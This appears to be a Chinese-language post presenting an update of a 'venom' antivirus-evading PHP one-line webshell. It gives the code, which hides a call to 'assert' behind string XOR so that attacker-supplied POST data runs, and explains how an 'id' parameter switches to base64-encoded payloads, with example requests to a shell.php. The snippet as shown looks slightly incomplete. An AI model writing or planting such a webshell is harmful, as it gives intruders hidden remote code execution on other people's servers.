venom 33 的更新,webshell免杀PHP 一句话
,体积更小了。
|
class VMTX{
function __destruct(){
$BRLI=‘f$vjcT’^“\x7\x57\x5\xf\x11\x20”;
return @$BRLI(“$this->EKDL”);
}
}
@$vmtx->EKDL=isset($_GET[‘id’])?base64_decode($_POST[‘mr6’]):$_POST[‘mr6’];
?>
|
使用说明
是否传入 id 参数决定是否把流量编码
|
http://www.xxx.com/shell.php
POST: mr6=phpinfo(); //与普通 shell 相同
http://www.xxx.com/shell.php?id=xxx(xxxx 随便修改)
POST: mr6=cGhwaW5mbygpOwo= //payload 的 base64 编码
|